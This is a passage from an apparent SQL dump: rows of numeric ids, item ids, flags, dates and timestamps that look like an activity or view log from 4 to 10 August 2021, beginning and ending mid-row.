10:57:40'),(29864,2159,1,'2021-08-04','2021-08-04 11:02:14'),(29865,1604,1,'2021-08-04','2021-08-04 11:14:27'),(29866,2991,1,'2021-08-04','2021-08-04 11:15:35'),(29867,2457,1,'2021-08-04','2021-08-04 11:54:48'),(29868,472,1,'2021-08-04','2021-08-04 11:57:37'),(29869,1604,1,'2021-08-04','2021-08-04 12:00:37'),(29870,2395,1,'2021-08-04','2021-08-04 12:42:53'),(29871,80,1,'2021-08-04','2021-08-04 12:43:01'),(29872,2395,1,'2021-08-04','2021-08-04 12:48:42'),(29873,2159,1,'2021-08-04','2021-08-04 13:00:57'),(29874,1598,1,'2021-08-04','2021-08-04 13:20:25'),(29875,91,1,'2021-08-04','2021-08-04 13:26:01'),(29876,1778,1,'2021-08-04','2021-08-04 13:38:40'),(29877,3030,1,'2021-08-04','2021-08-04 14:25:32'),(29878,2159,1,'2021-08-04','2021-08-04 14:27:42'),(29879,1743,1,'2021-08-04','2021-08-04 14:38:26'),(29880,1778,1,'2021-08-04','2021-08-04 14:38:41'),(29881,1722,1,'2021-08-04','2021-08-04 15:01:06'),(29882,2503,1,'2021-08-04','2021-08-04 15:18:36'),(29883,1588,1,'2021-08-04','2021-08-04 15:37:57'),(29884,1588,1,'2021-08-04','2021-08-04 15:43:43'),(29885,1602,1,'2021-08-04','2021-08-04 16:27:47'),(29886,1724,1,'2021-08-04','2021-08-04 16:48:35'),(29887,1614,1,'2021-08-04','2021-08-04 17:06:52'),(29888,2297,1,'2021-08-04','2021-08-04 17:14:11'),(29889,1614,1,'2021-08-04','2021-08-04 17:21:41'),(29890,2161,1,'2021-08-04','2021-08-04 17:54:44'),(29891,80,1,'2021-08-04','2021-08-04 18:16:23'),(29892,1592,1,'2021-08-04','2021-08-04 18:21:53'),(29893,2704,1,'2021-08-04','2021-08-04 18:21:59'),(29894,3030,1,'2021-08-04','2021-08-04 18:49:47'),(29895,1602,1,'2021-08-04','2021-08-04 18:51:41'),(29896,3245,1,'2021-08-04','2021-08-04 19:13:04'),(29897,1586,1,'2021-08-04','2021-08-04 19:21:41'),(29898,2309,1,'2021-08-04','2021-08-04 19:38:42'),(29899,570,1,'2021-08-04','2021-08-04 19:53:23'),(29900,2297,1,'2021-08-04','2021-08-04 20:03:13'),(29901,570,1,'2021-08-04','2021-08-04 20:08:07'),(29902,89,1,'2021-08-04','2021-08-04 20:16:58'),(29903,1737,1,'2021-08-04','2021-08-04 20:29:31'),(29904,1602,1,'2021-08-04','2021-08-04 20:59:22'),(29905,1582,1,'2021-08-04','2021-08-04 21:26:15'),(29906,570,1,'2021-08-04','2021-08-04 21:52:00'),(29907,1600,1,'2021-08-04','2021-08-04 22:21:45'),(29908,3705,1,'2021-08-04','2021-08-04 22:30:39'),(29909,3781,1,'2021-08-04','2021-08-04 22:33:53'),(29910,91,1,'2021-08-04','2021-08-04 22:54:22'),(29911,87,1,'2021-08-04','2021-08-04 22:55:10'),(29912,473,1,'2021-08-04','2021-08-04 22:57:46'),(29913,3790,1,'2021-08-04','2021-08-04 23:15:50'),(29914,1602,1,'2021-08-04','2021-08-04 23:29:30'),(29915,89,1,'2021-08-04','2021-08-04 23:36:57'),(29916,1582,1,'2021-08-04','2021-08-04 23:37:13'),(29917,1602,1,'2021-08-05','2021-08-05 01:24:35'),(29918,1602,1,'2021-08-05','2021-08-05 01:27:45'),(29919,1776,1,'2021-08-05','2021-08-05 02:13:03'),(29920,1778,1,'2021-08-05','2021-08-05 02:43:04'),(29921,2965,1,'2021-08-05','2021-08-05 03:27:47'),(29922,1722,1,'2021-08-05','2021-08-05 03:29:32'),(29923,1778,1,'2021-08-05','2021-08-05 03:43:07'),(29924,1776,1,'2021-08-05','2021-08-05 04:13:08'),(29925,3746,1,'2021-08-05','2021-08-05 04:56:33'),(29926,1602,1,'2021-08-05','2021-08-05 05:07:16'),(29927,89,1,'2021-08-05','2021-08-05 05:28:01'),(29928,1602,1,'2021-08-05','2021-08-05 06:08:20'),(29929,1602,1,'2021-08-05','2021-08-05 06:13:24'),(29930,3774,1,'2021-08-05','2021-08-05 06:29:21'),(29931,3764,1,'2021-08-05','2021-08-05 07:27:37'),(29932,1586,1,'2021-08-05','2021-08-05 07:35:03'),(29933,80,1,'2021-08-05','2021-08-05 07:37:32'),(29934,2161,1,'2021-08-05','2021-08-05 07:42:26'),(29935,1592,1,'2021-08-05','2021-08-05 07:57:46'),(29936,1602,1,'2021-08-05','2021-08-05 08:12:27'),(29937,1614,1,'2021-08-05','2021-08-05 08:27:28'),(29938,570,1,'2021-08-05','2021-08-05 08:57:26'),(29939,1582,1,'2021-08-05','2021-08-05 09:22:07'),(29940,74,1,'2021-08-05','2021-08-05 09:27:27'),(29941,80,1,'2021-08-05','2021-08-05 09:29:26'),(29942,1582,1,'2021-08-05','2021-08-05 09:33:13'),(29943,1582,1,'2021-08-05','2021-08-05 09:39:47'),(29944,1582,1,'2021-08-05','2021-08-05 09:40:03'),(29945,3486,1,'2021-08-05','2021-08-05 09:42:52'),(29946,1594,1,'2021-08-05','2021-08-05 09:54:07'),(29947,2904,1,'2021-08-05','2021-08-05 09:57:25'),(29948,84,1,'2021-08-05','2021-08-05 09:58:00'),(29949,87,1,'2021-08-05','2021-08-05 09:58:06'),(29950,91,1,'2021-08-05','2021-08-05 09:58:43'),(29951,89,1,'2021-08-05','2021-08-05 09:59:32'),(29952,91,1,'2021-08-05','2021-08-05 10:00:17'),(29953,3102,1,'2021-08-05','2021-08-05 10:00:34'),(29954,68,1,'2021-08-05','2021-08-05 10:01:16'),(29955,76,1,'2021-08-05','2021-08-05 10:01:25'),(29956,72,1,'2021-08-05','2021-08-05 10:02:07'),(29957,335,1,'2021-08-05','2021-08-05 10:02:30'),(29958,108,1,'2021-08-05','2021-08-05 10:02:39'),(29959,80,1,'2021-08-05','2021-08-05 10:03:07'),(29960,1604,1,'2021-08-05','2021-08-05 10:10:11'),(29961,1604,1,'2021-08-05','2021-08-05 10:10:12'),(29962,1604,1,'2021-08-05','2021-08-05 10:12:48'),(29963,1604,1,'2021-08-05','2021-08-05 10:17:43'),(29964,1604,1,'2021-08-05','2021-08-05 10:17:46'),(29965,1604,1,'2021-08-05','2021-08-05 10:18:06'),(29966,1604,1,'2021-08-05','2021-08-05 10:18:33'),(29967,1600,1,'2021-08-05','2021-08-05 10:27:24'),(29968,74,1,'2021-08-05','2021-08-05 10:43:10'),(29969,2904,1,'2021-08-05','2021-08-05 10:57:25'),(29970,1602,1,'2021-08-05','2021-08-05 11:11:28'),(29971,3486,1,'2021-08-05','2021-08-05 11:21:25'),(29972,3781,1,'2021-08-05','2021-08-05 11:31:33'),(29973,84,1,'2021-08-05','2021-08-05 11:51:30'),(29974,1582,1,'2021-08-05','2021-08-05 11:57:25'),(29975,2904,1,'2021-08-05','2021-08-05 11:58:26'),(29976,1602,1,'2021-08-05','2021-08-05 11:58:34'),(29977,2457,1,'2021-08-05','2021-08-05 12:09:25'),(29978,84,1,'2021-08-05','2021-08-05 12:18:28'),(29979,1604,1,'2021-08-05','2021-08-05 12:20:33'),(29980,91,1,'2021-08-05','2021-08-05 12:21:27'),(29981,84,1,'2021-08-05','2021-08-05 12:30:43'),(29982,80,1,'2021-08-05','2021-08-05 12:33:26'),(29983,2809,1,'2021-08-05','2021-08-05 12:45:25'),(29984,2809,1,'2021-08-05','2021-08-05 12:57:32'),(29985,30,1,'2021-08-05','2021-08-05 13:05:18'),(29986,1594,1,'2021-08-05','2021-08-05 13:06:48'),(29987,1594,1,'2021-08-05','2021-08-05 13:09:24'),(29988,89,1,'2021-08-05','2021-08-05 13:12:11'),(29989,74,1,'2021-08-05','2021-08-05 13:52:49'),(29990,2503,1,'2021-08-05','2021-08-05 13:53:00'),(29991,3079,1,'2021-08-05','2021-08-05 14:10:18'),(29992,1612,1,'2021-08-05','2021-08-05 14:34:57'),(29993,1612,1,'2021-08-05','2021-08-05 14:36:33'),(29994,1707,1,'2021-08-05','2021-08-05 14:40:29'),(29995,1697,1,'2021-08-05','2021-08-05 14:42:22'),(29996,1600,1,'2021-08-05','2021-08-05 14:53:33'),(29997,1606,1,'2021-08-05','2021-08-05 15:38:13'),(29998,1608,1,'2021-08-05','2021-08-05 15:39:32'),(29999,1606,1,'2021-08-05','2021-08-05 15:53:13'),(30000,1600,1,'2021-08-05','2021-08-05 16:03:09'),(30001,1600,1,'2021-08-05','2021-08-05 17:01:04'),(30002,1602,1,'2021-08-05','2021-08-05 17:23:43'),(30003,1604,1,'2021-08-05','2021-08-05 18:17:29'),(30004,1602,1,'2021-08-05','2021-08-05 20:05:40'),(30005,89,1,'2021-08-05','2021-08-05 21:47:32'),(30006,2309,1,'2021-08-05','2021-08-05 22:25:34'),(30007,1594,1,'2021-08-05','2021-08-05 22:45:23'),(30008,570,1,'2021-08-05','2021-08-05 23:05:22'),(30009,1582,1,'2021-08-05','2021-08-05 23:25:22'),(30010,91,1,'2021-08-06','2021-08-06 00:20:32'),(30011,3265,1,'2021-08-06','2021-08-06 00:35:21'),(30012,3788,1,'2021-08-06','2021-08-06 00:50:46'),(30013,3791,1,'2021-08-06','2021-08-06 00:51:53'),(30014,3787,1,'2021-08-06','2021-08-06 00:53:45'),(30015,3307,1,'2021-08-06','2021-08-06 00:56:04'),(30016,3791,1,'2021-08-06','2021-08-06 00:57:06'),(30017,3787,1,'2021-08-06','2021-08-06 00:59:56'),(30018,2971,1,'2021-08-06','2021-08-06 01:05:22'),(30019,3788,1,'2021-08-06','2021-08-06 01:06:14'),(30020,1592,1,'2021-08-06','2021-08-06 01:20:22'),(30021,80,1,'2021-08-06','2021-08-06 01:36:12'),(30022,3069,1,'2021-08-06','2021-08-06 01:48:58'),(30023,2161,1,'2021-08-06','2021-08-06 02:20:23'),(30024,1594,1,'2021-08-06','2021-08-06 02:35:06'),(30025,3265,1,'2021-08-06','2021-08-06 02:50:22'),(30026,2971,1,'2021-08-06','2021-08-06 03:20:34'),(30027,2813,1,'2021-08-06','2021-08-06 03:39:47'),(30028,1602,1,'2021-08-06','2021-08-06 04:27:48'),(30029,2704,1,'2021-08-06','2021-08-06 05:51:20'),(30030,3109,1,'2021-08-06','2021-08-06 05:52:10'),(30031,3790,1,'2021-08-06','2021-08-06 06:06:18'),(30032,3742,1,'2021-08-06','2021-08-06 06:27:58'),(30033,3721,1,'2021-08-06','2021-08-06 06:28:00'),(30034,3790,1,'2021-08-06','2021-08-06 06:36:17'),(30035,3777,1,'2021-08-06','2021-08-06 06:51:34'),(30036,2609,1,'2021-08-06','2021-08-06 07:06:19'),(30037,1610,1,'2021-08-06','2021-08-06 08:13:01'),(30038,1610,1,'2021-08-06','2021-08-06 08:13:05'),(30039,2297,1,'2021-08-06','2021-08-06 08:51:31'),(30040,1598,1,'2021-08-06','2021-08-06 09:34:13'),(30041,1598,1,'2021-08-06','2021-08-06 09:36:30'),(30042,1592,1,'2021-08-06','2021-08-06 09:53:31'),(30043,87,1,'2021-08-06','2021-08-06 10:06:37'),(30044,1728,1,'2021-08-06','2021-08-06 10:16:51'),(30045,1728,1,'2021-08-06','2021-08-06 10:19:45'),(30046,1728,1,'2021-08-06','2021-08-06 10:20:50'),(30047,3771,1,'2021-08-06','2021-08-06 10:21:24'),(30048,1728,1,'2021-08-06','2021-08-06 10:29:03'),(30049,1730,1,'2021-08-06','2021-08-06 10:31:32'),(30050,1602,1,'2021-08-06','2021-08-06 10:32:14'),(30051,1602,1,'2021-08-06','2021-08-06 10:37:12'),(30052,1602,1,'2021-08-06','2021-08-06 10:37:19'),(30053,1602,1,'2021-08-06','2021-08-06 10:38:23'),(30054,2503,1,'2021-08-06','2021-08-06 10:39:33'),(30055,1602,1,'2021-08-06','2021-08-06 10:39:58'),(30056,1586,1,'2021-08-06','2021-08-06 10:41:21'),(30057,1602,1,'2021-08-06','2021-08-06 10:44:38'),(30058,1594,1,'2021-08-06','2021-08-06 10:53:23'),(30059,1582,1,'2021-08-06','2021-08-06 11:01:19'),(30060,1598,1,'2021-08-06','2021-08-06 11:03:52'),(30061,2309,1,'2021-08-06','2021-08-06 11:12:35'),(30062,1582,1,'2021-08-06','2021-08-06 11:21:18'),(30063,1606,1,'2021-08-06','2021-08-06 11:32:36'),(30064,91,1,'2021-08-06','2021-08-06 11:41:21'),(30065,1598,1,'2021-08-06','2021-08-06 11:51:43'),(30066,1614,1,'2021-08-06','2021-08-06 12:01:22'),(30067,1598,1,'2021-08-06','2021-08-06 12:10:59'),(30068,1598,1,'2021-08-06','2021-08-06 12:11:02'),(30069,3777,1,'2021-08-06','2021-08-06 12:21:19'),(30070,3030,1,'2021-08-06','2021-08-06 12:27:15'),(30071,1600,1,'2021-08-06','2021-08-06 12:41:21'),(30072,1598,1,'2021-08-06','2021-08-06 12:47:30'),(30073,2704,1,'2021-08-06','2021-08-06 13:01:19'),(30074,1600,1,'2021-08-06','2021-08-06 13:04:02'),(30075,1600,1,'2021-08-06','2021-08-06 13:05:53'),(30076,89,1,'2021-08-06','2021-08-06 13:34:54'),(30077,2704,1,'2021-08-06','2021-08-06 14:01:21'),(30078,80,1,'2021-08-06','2021-08-06 14:31:24'),(30079,3771,1,'2021-08-06','2021-08-06 15:01:19'),(30080,1600,1,'2021-08-06','2021-08-06 15:05:43'),(30081,1774,1,'2021-08-06','2021-08-06 15:16:18'),(30082,570,1,'2021-08-06','2021-08-06 15:22:05'),(30083,470,1,'2021-08-06','2021-08-06 15:29:15'),(30084,2309,1,'2021-08-06','2021-08-06 15:49:41'),(30085,2309,1,'2021-08-06','2021-08-06 15:56:46'),(30086,1602,1,'2021-08-06','2021-08-06 16:00:21'),(30087,1602,1,'2021-08-06','2021-08-06 16:03:44'),(30088,1602,1,'2021-08-06','2021-08-06 16:10:16'),(30089,1594,1,'2021-08-06','2021-08-06 16:45:30'),(30090,1586,1,'2021-08-06','2021-08-06 16:57:05'),(30091,3045,1,'2021-08-06','2021-08-06 17:02:55'),(30092,1598,1,'2021-08-06','2021-08-06 17:26:20'),(30093,1544,1,'2021-08-06','2021-08-06 17:33:32'),(30094,1594,1,'2021-08-06','2021-08-06 18:48:25'),(30095,1544,1,'2021-08-06','2021-08-06 18:54:35'),(30096,80,1,'2021-08-06','2021-08-06 18:58:59'),(30097,3045,1,'2021-08-06','2021-08-06 19:01:18'),(30098,1586,1,'2021-08-06','2021-08-06 19:26:54'),(30099,1728,1,'2021-08-06','2021-08-06 19:55:49'),(30100,1586,1,'2021-08-06','2021-08-06 20:01:21'),(30101,1728,1,'2021-08-06','2021-08-06 20:04:17'),(30102,1592,1,'2021-08-06','2021-08-06 20:31:25'),(30103,1582,1,'2021-08-06','2021-08-06 21:01:21'),(30104,1606,1,'2021-08-06','2021-08-06 21:06:15'),(30105,477,1,'2021-08-06','2021-08-06 21:21:19'),(30106,2309,1,'2021-08-06','2021-08-06 22:37:05'),(30107,1600,1,'2021-08-06','2021-08-06 23:44:55'),(30108,1594,1,'2021-08-07','2021-08-07 05:22:14'),(30109,3030,1,'2021-08-07','2021-08-07 05:33:33'),(30110,3107,1,'2021-08-07','2021-08-07 05:39:44'),(30111,3030,1,'2021-08-07','2021-08-07 06:33:32'),(30112,1610,1,'2021-08-07','2021-08-07 07:51:12'),(30113,91,1,'2021-08-07','2021-08-07 07:51:39'),(30114,1610,1,'2021-08-07','2021-08-07 07:53:20'),(30115,3705,1,'2021-08-07','2021-08-07 08:03:46'),(30116,1602,1,'2021-08-07','2021-08-07 08:24:18'),(30117,1600,1,'2021-08-07','2021-08-07 08:39:07'),(30118,2156,1,'2021-08-07','2021-08-07 09:05:10'),(30119,1598,1,'2021-08-07','2021-08-07 09:21:57'),(30120,3771,1,'2021-08-07','2021-08-07 09:31:20'),(30121,1586,1,'2021-08-07','2021-08-07 09:57:27'),(30122,1724,1,'2021-08-07','2021-08-07 10:00:43'),(30123,2309,1,'2021-08-07','2021-08-07 10:04:16'),(30124,1582,1,'2021-08-07','2021-08-07 10:14:27'),(30125,1588,1,'2021-08-07','2021-08-07 10:23:53'),(30126,1602,1,'2021-08-07','2021-08-07 10:32:56'),(30127,2309,1,'2021-08-07','2021-08-07 10:54:26'),(30128,1606,1,'2021-08-07','2021-08-07 11:05:18'),(30129,2159,1,'2021-08-07','2021-08-07 11:10:31'),(30130,477,1,'2021-08-07','2021-08-07 11:25:09'),(30131,1598,1,'2021-08-07','2021-08-07 12:13:27'),(30132,1718,1,'2021-08-07','2021-08-07 13:24:01'),(30133,89,1,'2021-08-07','2021-08-07 13:27:24'),(30134,469,1,'2021-08-07','2021-08-07 13:44:21'),(30135,1588,1,'2021-08-07','2021-08-07 14:24:23'),(30136,3781,1,'2021-08-07','2021-08-07 14:40:17'),(30137,3781,1,'2021-08-07','2021-08-07 14:40:25'),(30138,1598,1,'2021-08-07','2021-08-07 14:41:38'),(30139,3030,1,'2021-08-07','2021-08-07 14:44:30'),(30140,1544,1,'2021-08-07','2021-08-07 15:05:02'),(30141,1544,1,'2021-08-07','2021-08-07 15:14:59'),(30142,2410,1,'2021-08-07','2021-08-07 15:35:09'),(30143,1598,1,'2021-08-07','2021-08-07 15:38:53'),(30144,1598,1,'2021-08-07','2021-08-07 16:23:34'),(30145,1606,1,'2021-08-07','2021-08-07 17:56:13'),(30146,3781,1,'2021-08-07','2021-08-07 19:36:31'),(30147,3781,1,'2021-08-07','2021-08-07 19:46:20'),(30148,3069,1,'2021-08-07','2021-08-07 19:57:47'),(30149,3781,1,'2021-08-07','2021-08-07 20:01:53'),(30150,3781,1,'2021-08-07','2021-08-07 20:01:55'),(30151,3781,1,'2021-08-07','2021-08-07 20:04:10'),(30152,3781,1,'2021-08-07','2021-08-07 20:05:24'),(30153,2309,1,'2021-08-07','2021-08-07 20:17:12'),(30154,3781,1,'2021-08-07','2021-08-07 20:30:52'),(30155,1598,1,'2021-08-07','2021-08-07 20:32:36'),(30156,3030,1,'2021-08-07','2021-08-07 20:34:18'),(30157,1586,1,'2021-08-07','2021-08-07 20:51:11'),(30158,1602,1,'2021-08-07','2021-08-07 21:21:07'),(30159,1600,1,'2021-08-07','2021-08-07 21:36:08'),(30160,1602,1,'2021-08-07','2021-08-07 21:51:08'),(30161,3781,1,'2021-08-07','2021-08-07 22:02:20'),(30162,108,1,'2021-08-07','2021-08-07 22:05:31'),(30163,89,1,'2021-08-07','2021-08-07 22:05:40'),(30164,1600,1,'2021-08-07','2021-08-07 22:06:10'),(30165,2309,1,'2021-08-07','2021-08-07 23:05:35'),(30166,1602,1,'2021-08-07','2021-08-07 23:21:11'),(30167,2769,1,'2021-08-07','2021-08-07 23:35:44'),(30168,1596,1,'2021-08-07','2021-08-07 23:55:57'),(30169,1602,1,'2021-08-08','2021-08-08 00:10:04'),(30170,1604,1,'2021-08-08','2021-08-08 00:21:11'),(30171,1602,1,'2021-08-08','2021-08-08 02:20:54'),(30172,1586,1,'2021-08-08','2021-08-08 02:24:01'),(30173,3030,1,'2021-08-08','2021-08-08 02:56:45'),(30174,3226,1,'2021-08-08','2021-08-08 03:24:02'),(30175,1747,1,'2021-08-08','2021-08-08 03:47:19'),(30176,74,1,'2021-08-08','2021-08-08 04:28:19'),(30177,89,1,'2021-08-08','2021-08-08 05:56:40'),(30178,2309,1,'2021-08-08','2021-08-08 06:18:57'),(30179,1598,1,'2021-08-08','2021-08-08 06:29:10'),(30180,1598,1,'2021-08-08','2021-08-08 06:29:27'),(30181,1598,1,'2021-08-08','2021-08-08 06:34:25'),(30182,1602,1,'2021-08-08','2021-08-08 06:38:12'),(30183,1602,1,'2021-08-08','2021-08-08 07:08:10'),(30184,2769,1,'2021-08-08','2021-08-08 07:09:15'),(30185,1544,1,'2021-08-08','2021-08-08 07:10:16'),(30186,3781,1,'2021-08-08','2021-08-08 07:22:41'),(30187,2911,1,'2021-08-08','2021-08-08 07:49:25'),(30188,3030,1,'2021-08-08','2021-08-08 08:50:04'),(30189,1598,1,'2021-08-08','2021-08-08 08:50:07'),(30190,570,1,'2021-08-08','2021-08-08 09:21:07'),(30191,3781,1,'2021-08-08','2021-08-08 09:22:17'),(30192,3058,1,'2021-08-08','2021-08-08 10:30:43'),(30193,1586,1,'2021-08-08','2021-08-08 10:36:10'),(30194,1586,1,'2021-08-08','2021-08-08 10:51:59'),(30195,1602,1,'2021-08-08','2021-08-08 11:16:01'),(30196,2297,1,'2021-08-08','2021-08-08 11:22:28'),(30197,2297,1,'2021-08-08','2021-08-08 11:25:40'),(30198,2297,1,'2021-08-08','2021-08-08 11:28:19'),(30199,3226,1,'2021-08-08','2021-08-08 11:51:08'),(30200,1606,1,'2021-08-08','2021-08-08 11:51:16'),(30201,1766,1,'2021-08-08','2021-08-08 12:21:10'),(30202,2911,1,'2021-08-08','2021-08-08 12:41:07'),(30203,1604,1,'2021-08-08','2021-08-08 12:42:23'),(30204,570,1,'2021-08-08','2021-08-08 12:51:07'),(30205,2804,1,'2021-08-08','2021-08-08 14:02:03'),(30206,2457,1,'2021-08-08','2021-08-08 14:21:08'),(30207,1612,1,'2021-08-08','2021-08-08 14:51:09'),(30208,89,1,'2021-08-08','2021-08-08 15:07:47'),(30209,3030,1,'2021-08-08','2021-08-08 15:12:20'),(30210,2309,1,'2021-08-08','2021-08-08 15:42:26'),(30211,80,1,'2021-08-08','2021-08-08 16:00:52'),(30212,80,1,'2021-08-08','2021-08-08 16:01:19'),(30213,80,1,'2021-08-08','2021-08-08 16:01:42'),(30214,80,1,'2021-08-08','2021-08-08 16:02:01'),(30215,3705,1,'2021-08-08','2021-08-08 16:02:35'),(30216,2609,1,'2021-08-08','2021-08-08 16:41:22'),(30217,1602,1,'2021-08-08','2021-08-08 16:51:06'),(30218,1588,1,'2021-08-08','2021-08-08 17:03:15'),(30219,3307,1,'2021-08-08','2021-08-08 17:13:38'),(30220,1544,1,'2021-08-08','2021-08-08 17:23:16'),(30221,1598,1,'2021-08-08','2021-08-08 18:04:08'),(30222,1724,1,'2021-08-08','2021-08-08 18:27:37'),(30223,1724,1,'2021-08-08','2021-08-08 18:27:49'),(30224,1724,1,'2021-08-08','2021-08-08 18:28:08'),(30225,2813,1,'2021-08-08','2021-08-08 18:34:43'),(30226,1608,1,'2021-08-08','2021-08-08 18:42:52'),(30227,2769,1,'2021-08-08','2021-08-08 19:15:09'),(30228,3030,1,'2021-08-08','2021-08-08 19:35:14'),(30229,1728,1,'2021-08-08','2021-08-08 20:35:10'),(30230,1614,1,'2021-08-08','2021-08-08 22:04:08'),(30231,1614,1,'2021-08-08','2021-08-08 22:04:33'),(30232,1724,1,'2021-08-08','2021-08-08 22:07:00'),(30233,72,1,'2021-08-08','2021-08-08 22:21:26'),(30234,3069,1,'2021-08-08','2021-08-08 22:25:36'),(30235,89,1,'2021-08-08','2021-08-08 22:27:34'),(30236,1870,1,'2021-08-08','2021-08-08 22:45:43'),(30237,3087,1,'2021-08-09','2021-08-09 00:21:10'),(30238,2457,1,'2021-08-09','2021-08-09 00:28:55'),(30239,1596,1,'2021-08-09','2021-08-09 01:35:27'),(30240,2309,1,'2021-08-09','2021-08-09 01:36:27'),(30241,3104,1,'2021-08-09','2021-08-09 01:58:54'),(30242,477,1,'2021-08-09','2021-08-09 02:36:59'),(30243,2309,1,'2021-08-09','2021-08-09 02:46:57'),(30244,1610,1,'2021-08-09','2021-08-09 02:52:00'),(30245,3486,1,'2021-08-09','2021-08-09 03:06:59'),(30246,570,1,'2021-08-09','2021-08-09 03:36:58'),(30247,2813,1,'2021-08-09','2021-08-09 03:57:16'),(30248,3034,1,'2021-08-09','2021-08-09 03:58:55'),(30249,1608,1,'2021-08-09','2021-08-09 04:14:01'),(30250,1582,1,'2021-08-09','2021-08-09 04:30:11'),(30251,1598,1,'2021-08-09','2021-08-09 04:37:34'),(30252,1608,1,'2021-08-09','2021-08-09 04:43:57'),(30253,2813,1,'2021-08-09','2021-08-09 04:47:46'),(30254,1612,1,'2021-08-09','2021-08-09 04:58:53'),(30255,1592,1,'2021-08-09','2021-08-09 05:07:48'),(30256,3282,1,'2021-08-09','2021-08-09 05:43:58'),(30257,2159,1,'2021-08-09','2021-08-09 05:54:55'),(30258,3030,1,'2021-08-09','2021-08-09 06:38:26'),(30259,3069,1,'2021-08-09','2021-08-09 07:08:22'),(30260,3705,1,'2021-08-09','2021-08-09 07:48:24'),(30261,3781,1,'2021-08-09','2021-08-09 08:22:56'),(30262,2804,1,'2021-08-09','2021-08-09 08:28:40'),(30263,1596,1,'2021-08-09','2021-08-09 08:44:07'),(30264,1588,1,'2021-08-09','2021-08-09 09:29:08'),(30265,1600,1,'2021-08-09','2021-08-09 09:42:12'),(30266,1606,1,'2021-08-09','2021-08-09 09:59:22'),(30267,1870,1,'2021-08-09','2021-08-09 10:19:26'),(30268,1594,1,'2021-08-09','2021-08-09 10:27:02'),(30269,1598,1,'2021-08-09','2021-08-09 10:42:32'),(30270,3058,1,'2021-08-09','2021-08-09 11:00:51'),(30271,3253,1,'2021-08-09','2021-08-09 11:10:13'),(30272,2309,1,'2021-08-09','2021-08-09 11:20:22'),(30273,1602,1,'2021-08-09','2021-08-09 11:42:32'),(30274,68,1,'2021-08-09','2021-08-09 11:42:59'),(30275,1602,1,'2021-08-09','2021-08-09 11:43:08'),(30276,2457,1,'2021-08-09','2021-08-09 13:08:13'),(30277,2309,1,'2021-08-09','2021-08-09 13:43:19'),(30278,3045,1,'2021-08-09','2021-08-09 14:08:36'),(30279,3259,1,'2021-08-09','2021-08-09 14:37:27'),(30280,89,1,'2021-08-09','2021-08-09 14:53:16'),(30281,1600,1,'2021-08-09','2021-08-09 15:01:46'),(30282,1598,1,'2021-08-09','2021-08-09 15:41:59'),(30283,80,1,'2021-08-09','2021-08-09 15:51:01'),(30284,2309,1,'2021-08-09','2021-08-09 15:51:43'),(30285,3030,1,'2021-08-09','2021-08-09 16:01:43'),(30286,2813,1,'2021-08-09','2021-08-09 17:25:54'),(30287,1606,1,'2021-08-09','2021-08-09 17:26:18'),(30288,3069,1,'2021-08-09','2021-08-09 17:36:06'),(30289,1614,1,'2021-08-09','2021-08-09 17:49:05'),(30290,3781,1,'2021-08-09','2021-08-09 17:56:57'),(30291,2159,1,'2021-08-09','2021-08-09 18:11:14'),(30292,1602,1,'2021-08-09','2021-08-09 18:12:47'),(30293,76,1,'2021-08-09','2021-08-09 18:13:17'),(30294,3282,1,'2021-08-09','2021-08-09 18:13:23'),(30295,91,1,'2021-08-09','2021-08-09 18:13:50'),(30296,76,1,'2021-08-09','2021-08-09 18:16:42'),(30297,3781,1,'2021-08-09','2021-08-09 18:37:43'),(30298,3781,1,'2021-08-09','2021-08-09 18:42:46'),(30299,3781,1,'2021-08-09','2021-08-09 18:46:02'),(30300,3781,1,'2021-08-09','2021-08-09 18:48:57'),(30301,1602,1,'2021-08-09','2021-08-09 18:51:14'),(30302,3781,1,'2021-08-09','2021-08-09 19:04:56'),(30303,3781,1,'2021-08-09','2021-08-09 19:15:07'),(30304,3781,1,'2021-08-09','2021-08-09 19:15:14'),(30305,80,1,'2021-08-09','2021-08-09 19:17:36'),(30306,68,1,'2021-08-09','2021-08-09 19:20:47'),(30307,76,1,'2021-08-09','2021-08-09 19:22:40'),(30308,89,1,'2021-08-09','2021-08-09 19:23:01'),(30309,1582,1,'2021-08-09','2021-08-09 19:23:14'),(30310,3781,1,'2021-08-09','2021-08-09 19:27:30'),(30311,1582,1,'2021-08-09','2021-08-09 20:17:39'),(30312,87,1,'2021-08-09','2021-08-09 21:48:14'),(30313,87,1,'2021-08-09','2021-08-09 21:49:01'),(30314,91,1,'2021-08-09','2021-08-09 21:49:06'),(30315,84,1,'2021-08-09','2021-08-09 21:49:30'),(30316,3694,1,'2021-08-09','2021-08-09 21:49:55'),(30317,68,1,'2021-08-09','2021-08-09 21:54:01'),(30318,68,1,'2021-08-09','2021-08-09 21:55:42'),(30319,68,1,'2021-08-09','2021-08-09 22:00:25'),(30320,68,1,'2021-08-09','2021-08-09 22:08:10'),(30321,2457,1,'2021-08-09','2021-08-09 22:14:24'),(30322,3781,1,'2021-08-09','2021-08-09 22:25:27'),(30323,1724,1,'2021-08-09','2021-08-09 22:44:09'),(30324,1606,1,'2021-08-09','2021-08-09 22:47:26'),(30325,3781,1,'2021-08-09','2021-08-09 22:48:49'),(30326,1588,1,'2021-08-10','2021-08-10 00:26:55'),(30327,1606,1,'2021-08-10','2021-08-10 00:36:54'),(30328,3498,1,'2021-08-10','2021-08-10 00:47:03'),(30329,3674,1,'2021-08-10','2021-08-10 00:57:03'),(30330,3313,1,'2021-08-10','2021-08-10 02:14:49'),(30331,2769,1,'2021-08-10','2021-08-10 02:38:07'),(30332,3781,1,'2021-08-10','2021-08-10 02:59:19'),(30333,3781,1,'2021-08-10','2021-08-10 03:06:16'),(30334,2558,1,'2021-08-10','2021-08-10 03:18:28'),(30335,1774,1,'2021-08-10','2021-08-10 03:30:11'),(30336,3781,1,'2021-08-10','2021-08-10 03:34:23'),(30337,3030,1,'2021-08-10','2021-08-10 03:38:04'),(30338,2813,1,'2021-08-10','2021-08-10 03:48:16'),(30339,2457,1,'2021-08-10','2021-08-10 06:01:23'),(30340,3781,1,'2021-08-10','2021-08-10 06:10:14'),(30341,1734,1,'2021-08-10','2021-08-10 06:31:21'),(30342,3781,1,'2021-08-10','2021-08-10 06:44:21'),(30343,3781,1,'2021-08-10','2021-08-10 06:58:06'),(30344,1612,1,'2021-08-10','2021-08-10 07:01:21'),(30345,3781,1,'2021-08-10','2021-08-10 07:07:16'),(30346,2309,1,'2021-08-10','2021-08-10 08:01:09'),(30347,80,1,'2021-08-10','2021-08-10 08:05:35'),(30348,80,1,'2021-08-10','2021-08-10 08:06:45'),(30349,1582,1,'2021-08-10','2021-08-10 